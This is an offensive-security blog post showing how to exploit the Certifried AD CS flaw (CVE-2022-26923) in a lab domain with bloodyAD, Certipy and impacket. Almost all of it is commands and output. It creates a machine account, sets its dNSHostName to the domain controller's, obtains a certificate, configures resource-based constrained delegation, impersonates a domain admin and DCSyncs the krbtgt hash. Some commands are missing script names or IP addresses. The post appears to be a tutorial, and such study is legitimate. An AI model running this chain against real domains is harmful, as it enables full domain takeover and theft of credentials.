Total Recall

Tips and tricks on offensive security especially active directory privilege escalation techniques using bloodyAD.

View on GitHub
11 May 2022

bloodyAD and Certifried (CVE-2022-26923)

by soka

A new ADCS privesc was released: Certifried (CVE-2022-26923) with this blogpost after Microsoft patched it. Here is an example on how to exploit this vulnerability with bloodyAD and PKINIT not supported from Linux.


We need to own a computer, either we pwned one or we can create one if ms-DS-MachineAccountQuota>0:

> python -d crashlab.local -u testuser -p 'totoTOTOtoto1234*' --host get object 'DC=crashlab,DC=local' --attr ms-DS-MachineAccountQuota                     

distinguishedName: DC=crashlab,DC=local
ms-DS-MachineAccountQuota: 10

We create a Computer object cve in the LDAP:

> python -d crashlab.local -u testuser -p 'totoTOTOtoto1234*' --host addComputer cve 'CVEPassword1234*'

[+] cve created

Then we set the attribute dNSHostName (empty when we created the object) to match the Domain Controller DNS Hostname: CRASHDC.crashlab.local.

> python -d crashlab.local -u testuser -p 'totoTOTOtoto1234*' --host set object 'CN=cve,CN=Computers,DC=crashlab,DC=local' dNSHostName -v CRASHDC.crashlab.local

[+] CN=cve,CN=Computers,DC=crashlab,DC=local's dnsHostName has been updated

To check if the attribute has been correctly set:

> python -d crashlab.local -u testuser -p 'totoTOTOtoto1234*' --host get object 'CN=cve,CN=Computers,DC=crashlab,DC=local' --attr dNSHostName                  

distinguishedName: CN=cve,CN=Computers,DC=crashlab,DC=local
dNSHostName: CRASHDC.crashlab.local

Now we can use Certipy to request a certificate for the computer cve:

# is the ADCS server
> certipy req 'crashlab.local/cve$:CVEPassword1234*@' -template Machine -dc-ip -ca crashlab-ADCS-CA
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with DNS Host Name 'CRASHDC.crashlab.local'
[*] Saved certificate and private key to 'crashdc.pfx'

Now we’ll try to get a TGT using Certipy with the certificate requested above:

> certipy auth -pfx ./crashdc.pfx -dc-ip
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: crashdc$@crashlab.local
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

PKINIT doesn’t seem to work on this AD, let’s try RBCD technique with bloodyAD and its certificate authentication feature:

> openssl pkcs12 -in crashdc.pfx -out crashdc.pem -nodes
> python -d crashlab.local  -c ":crashdc.pem" -u 'cve$' --host add rbcd 'CRASHDC$' 'CVE$'
[+] CVE$ SID is: S-1-5-21-1945936656-2616711065-1665664270-1134             
[+] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity correctly set        
[+] Delegation rights modified successfully!                                                                           
CVE$ can now impersonate users on CRASHDC$ via S4U2Proxy

Delegation rights are set up, we can now use impacket to impersonate a Domain admin (emacron in our case) on CRASHDC$ and fetch a TGT:

> -spn LDAP/CRASHDC.CRASHLAB.LOCAL -impersonate emacron -dc-ip 'crashlab.local/cve$:CVEPassword1234*'                 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation                                                               
[*] Getting TGT for user                                                                                               
[*] Impersonating emacron                                                                                              
[*]     Requesting S4U2self                                                                                            
[*]     Requesting S4U2Proxy
[*] Saving ticket in emacron.ccache

> cp emacron.ccache /tmp/
> export KRB5CCNAME=/tmp/emacron.ccache

Finally we’ll use impacket to perform a DCSync with the exported TGT:

> -user-status -just-dc-ntlm -just-dc-user krbtgt 'crashlab.local/emacron@crashdc.crashlab.local' -k -no-pass -dc-ip -target-ip 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:492850f62466ef2bd1f4a56f112e01f1::: (status=Disabled)
[*] Cleaning up...
tags: ad - privesc - bloodyad - kerberos - authentication